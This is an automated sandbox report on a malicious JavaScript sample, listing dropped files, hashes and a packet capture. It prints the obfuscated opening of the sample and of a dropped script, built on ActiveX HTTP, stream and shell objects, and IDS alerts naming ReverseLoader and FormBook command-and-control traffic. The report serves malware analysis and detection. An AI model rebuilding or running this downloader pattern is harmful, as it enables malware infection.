                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlllulx51ll/h:NllU
                                                                                                            MD5:4293FEE5C8B10DA4F196BB8D3E9677AB
                                                                                                            SHA1:24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
                                                                                                            SHA-256:95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
                                                                                                            SHA-512:262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
                                                                                                            Malicious:false
                                                                                                            Preview:@...e................................. ..............@..........

                                                                                                            C:\Users\user\AppData\Local\Temp\4789071F

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\choice.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1koidkl2.tl5.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ideypu5c.nym.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1nqemrd.kn2.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u13dcyzd.mpy.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\ostaxa.js

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):158537
                                                                                                            Entropy (8bit):5.5298288159427935
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:XsYLPbdfgSBsYLPa60th/n/70xxeWTBIRArQnDvxRQ0AMmXLMkAvZjpKy+DNmX/n:XdbJTBdbAAdbJTBdba
                                                                                                            MD5:09C464C5A093ABE3B6DCFFCB63B707A6
                                                                                                            SHA1:A49070306F8B1337361B621EFAFEEF0AEE9EF6F9
                                                                                                            SHA-256:8219DBF8AFE5564E153E2F354254BA29AC7B84BD5B1D6AF3FAA32133AE33492C
                                                                                                            SHA-512:EB530DA9A54484A7F3FAADCB4085F0959CFCF82738E334F57C610DF91E6A86056B1CEC95BC989FF46B4D554BC4409866026BCADF88E0C57EA20A413D4FEE8FAA
                                                                                                            Malicious:true
                                                                                                            Preview:PkWozPeWencNJpb = "kcKgcxiodWfLWPi"..iUbmWapNUANiLAd = "mZkRptWWWKiGIhn"..psCeWLhQoZtbfrW = "OZKdWhPLjWkOKba"..PHLQikLeHCmnKlf = "PLvWzWviLgkiKpL"..LGilGWGPOiogLBN = "UAaWheLhWLlPqBz"..HWihdKuKnxUGdmG = "efNbWLPaIALAjfA"..SKNoLmLxLeWknKl = "KGTumLnGNGPKURN"..PNQcGiOAtoLtLIc = "KZRRzmmNLGsTbLP"..idAAJRpWPmPaBTb = "rLNZKiWLKKPzKko"..fLWCriWzBGbLjCJ = "nLzoNeWLGeKaLhm"....WQhofUHWehlNJmL = "alieGLPWpmCWmta"..iCBGbWmoHKxILhO = "cikLrJWuKdLHkGd"..oGcaWcuUIecCWZR = "xAfClzBcUWsLKGf"..bWLcAuheKKKgbvK = "WxeWtKiiGOdLPNz"..kkKWoWcpdHCZPiG = "LlHQptGoWumiGKK"..UUKnzdeuLmLgzSN = "vLGlxqGiCfoZWdc"..izRzUzPAuAtGLWh = "gcmcLWjSfeUWGfL"..rZWijWPJuWUAuZN = "dJWiSzWiaxUAKLe"..cLcethkKJofkWUK = "qWBdezZcAZGmWiC"..KhcUQbhozhrWCpp = "OQocGOZtkakWZAo"....nZNiPRKWtWKCzcN = "iLGKGJNicKiiAKn"..APkLLWLcoLhLWdz = "KPkKQqbLNUJfeoA"..qWhUAtNPWlemzLK = "NKclPZPLGUtAuWC"..LmOkiWxBrHAWANJ = "cPWGtNJezKfQIWi"..LhifpChZzZkCbrR = "vWaGGBdHjzbhmWl"..LBZbUKNAiOiKuCi = "OHHcLQCSKWilLzP"..ckLPqxGdvLGUtJo = "uAKzNbiqLqWiWzq

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:Unicode text, UTF-16, little-endian text, with very long lines (641), with CRLF line terminators
                                                                                                            Entropy (8bit):4.5445165635152565
                                                                                                            TrID:
                                                                                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                            • MP3 audio (1001/1) 32.22%
                                                                                                            • Lumena CEL bitmap (63/63) 2.03%
                                                                                                            • Corel Photo Paint (41/41) 1.32%
                                                                                                            File name:1013911.js
                                                                                                            File size:3'272 bytes
                                                                                                            MD5:55be1707eaf08b827b66cc78a1e69e16
                                                                                                            SHA1:a826394d49fc7ad0e3db1ca040c167ef40ea9bdd
                                                                                                            SHA256:bf92cd30b94f0164d738c92a6be0fd7d72e0795d3ab1868cf0ec8ec1e57a201b
                                                                                                            SHA512:046d04a6ff5d003eff34561d4ec85f11bd633af127ed9d40796775d975f646904d8ceb61135cb6375b538863ed8b98fb178cc6f0a0516b0cbb995165a4755281
                                                                                                            SSDEEP:48:Xvy8Is8ZUImUswLJMlDPm30I+VybypyJydxX36tb4ym7:XVMMlDPm30LdXqtb4X
                                                                                                            TLSH:9B61D0512ADA1104F2E50EDB377713606E23790E5C39A7098B784E6E2FF3864E966F43
                                                                                                            File Content Preview:..v.a.r. .i.n.j.u.d.i.c.i.o.s.o. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...X.M.L.H.T.T.P.".).;.....v.a.r. .g.u.i.t.i.t.i.r.o.b.a. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".A.D.O.D.B...S.t.r.e.a.m.".).;.....v.a.r. .s.h.e.l.l.l.l. .=. .n.e.w

                                                                                                            File Icon

                                                                                                            Icon Hash:68d69b8bb6aa9a86

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-03T10:05:09.005082+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.449731TCP
                                                                                                            2024-12-03T10:05:25.647927+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449738104.21.84.67443TCP
                                                                                                            2024-12-03T10:05:26.705288+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.449738TCP
                                                                                                            2024-12-03T10:06:04.610000+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449751192.186.57.3080TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 3, 2024 10:04:56.615667105 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:56.615719080 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:56.615792990 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:56.624072075 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:56.624088049 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:57.888884068 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:57.889041901 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.307914972 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.307952881 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.308290958 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.308346987 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.312434912 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.359344006 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.715053082 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.715111017 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.715147972 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.715199947 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.715217113 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.715261936 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.715301037 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.715435982 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.722103119 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.722198009 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.722208977 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.722256899 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.772406101 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.772671938 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.776369095 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.776473999 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.776494980 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.776592970 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.835026026 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.835275888 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.914918900 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.915061951 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.917282104 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.917499065 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.917512894 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.917563915 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.926794052 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.926879883 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.936702013 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.936825991 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.936832905 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.936889887 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.942583084 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.942677021 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.942683935 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.942763090 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.954339981 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.954406023 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.954412937 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.954456091 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.959423065 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.959501982 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.967766047 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.967839956 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.967848063 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.967900038 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.976103067 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.976164103 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.982395887 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.982490063 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.982559919 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.982625008 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.990864038 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.990978956 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.991039038 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.991120100 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.999264002 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.999366999 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:58.999389887 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:58.999464035 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.007668018 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.007760048 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.034862041 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.035041094 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.035065889 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.035135984 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.116460085 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.116619110 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.116664886 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.116712093 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.120752096 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.120848894 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.129045963 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.129102945 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.129132986 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.129190922 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.137577057 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.137636900 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.137666941 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.137711048 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.151225090 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.151309013 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.164557934 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.164654970 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.172101974 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.172205925 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.177717924 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.177793980 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.183861017 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.183933973 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.190038919 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.190110922 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.193329096 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.193392038 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.196400881 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.196465969 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.202538967 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.202610016 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.208693981 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.208762884 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.211926937 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.212003946 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.318969011 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.319058895 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.358716965 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.358870983 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.361401081 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.361571074 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.367620945 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.367712021 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.370803118 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.370862961 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.374772072 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.374830961 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.376847029 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.376905918 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.380686998 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.380759954 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.384607077 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.384670973 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.388544083 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.388602972 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.390661001 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.390717030 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.394531965 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.394613981 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.398488045 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.398554087 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.400490046 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.400547981 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.402528048 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.402592897 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.402606964 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.402627945 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.402647018 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.402692080 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.402796984 CET49730443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:04:59.402815104 CET44349730104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:04:59.897521973 CET49675443192.168.2.4173.222.162.32
                                                                                                            Dec 3, 2024 10:05:02.921278954 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:02.921343088 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:02.921418905 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:02.930897951 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:02.930927038 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.238137960 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.238256931 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.241394043 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.241410971 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.241679907 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.247895002 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.291343927 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.969933987 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.970221043 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.970267057 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.970282078 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.970293999 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.970315933 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.970335960 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.978537083 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.978605986 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.978614092 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.986958981 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.987008095 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.987015009 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.995455027 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:04.995501041 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:04.995507956 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.038171053 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:05.038177967 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.085036039 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:05.090677977 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.131911993 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:05.181068897 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.184473038 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.184529066 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:05.184581995 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.192296028 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:05.192348957 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:05.192364931 CET44349731151.101.1.137192.168.2.4
